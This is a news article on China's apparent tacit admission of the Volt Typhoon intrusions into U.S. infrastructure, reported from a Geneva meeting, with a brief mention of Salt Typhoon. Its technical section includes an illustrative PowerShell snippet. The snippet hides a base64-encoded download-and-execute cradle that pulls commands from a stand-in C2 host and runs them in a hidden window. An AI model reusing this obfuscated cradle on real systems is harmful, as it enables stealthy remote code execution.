Chinese officials have implicitly acknowledged responsibility for a series of sophisticated cyber intrusions targeting critical U.S. infrastructure.
During a high-level meeting in Geneva with American officials, representatives from China’s Ministry of Foreign Affairs indirectly linked years of computer network breaches at U.S. ports, water utilities, airports, and other critical targets to increasing U.S. policy support for Taiwan.
The campaign, dubbed “Volt Typhoon” by security researchers, has been described by U.S. officials as an attempt to establish a foothold in critical networks that could be leveraged during a potential future conflict.
.png
)
The admission came during a previously undisclosed half-day summit in December, attended by approximately a dozen representatives from both countries, including senior officials from the State Department, National Security Council, Pentagon, and U.S. intelligence agencies.
The meeting was led by Nate Fick, then the ambassador-at-large for cyberspace and digital policy in the Biden administration.
While Chinese officials did not explicitly claim responsibility, their comments were interpreted by the American delegation as confirmation of Beijing’s involvement and a warning about U.S. involvement in Taiwan.
MSN analysts identified the Volt Typhoon campaign as particularly concerning due to its focus on civilian infrastructure rather than traditional intelligence targets.
Security researchers noted that the operation’s sophisticated nature and persistence techniques suggest a well-resourced, state-sponsored actor with long-term strategic objectives rather than immediate financial gain.
Wang Lei, a top cyber official with China’s Ministry of Foreign Affairs, made the comments after U.S. representatives emphasized that China appeared not to understand how dangerous prepositioning in civilian critical infrastructure was, and how such actions could be viewed as an act of war.
American officials present at the meeting perceived the remarks as confirmation of Beijing’s role and an attempt to deter U.S. involvement should conflict erupt in the Taiwan Strait.
The admission is considered extraordinary, as Chinese officials have typically denied involvement in cyber operations, blamed criminal entities, or accused the U.S. of fabricating allegations.
Dakota Cary, a China expert at cybersecurity firm SentinelOne, noted that such an acknowledgment, even indirectly, likely required instructions from the highest levels of President Xi Jinping’s government.
Technical Analysis of Volt Typhoon Campaign
Technical assessment of the Volt Typhoon operations reveals sophisticated living-off-the-land techniques where attackers leverage legitimate system tools and processes to avoid detection.
The campaign primarily exploits known vulnerabilities in network infrastructure devices, establishing persistence through modified system libraries. Once inside target networks, the actors maintain access through encrypted command-and-control channels that blend with legitimate traffic.
# Example of a typical living-off-the-land technique
# This illustrates how attackers might use PowerShell for stealthy execution
$payload = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘JABjAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBjADIALgBlAHgAYQBtAHAAbABlAC4AYwBvAG0ALwBjAG8AbQBtAGEAbgBkAC4AdAB4AHQAJwApAHwASQBFAFgA’));
powershell -EncodedCommand $payload -WindowStyle Hidden
The Geneva meeting also addressed a separate hacking campaign known as “Salt Typhoon,” which targeted U.S. telecommunications networks including AT&T and Verizon.
This operation reportedly allowed hackers working for China’s Ministry of State Security to access unencrypted calls and texts of numerous government officials and political figures, including those within the presidential campaigns of Donald Trump and Kamala Harris.
This tacit admission comes amid deteriorating relations between Washington and Beijing, locked in an escalating trade war.
The Trump administration has indicated plans to pursue more offensive cyber strikes against China, while simultaneously dismissing hundreds of cybersecurity workers and recently firing the director of the National Security Agency and his deputy, raising concerns about the government’s capacity to defend against ongoing attacks.
Equip your team with real-time threat analysis With ANY.RUN’s interactive cloud sandbox -> Try 14-day Free Trial
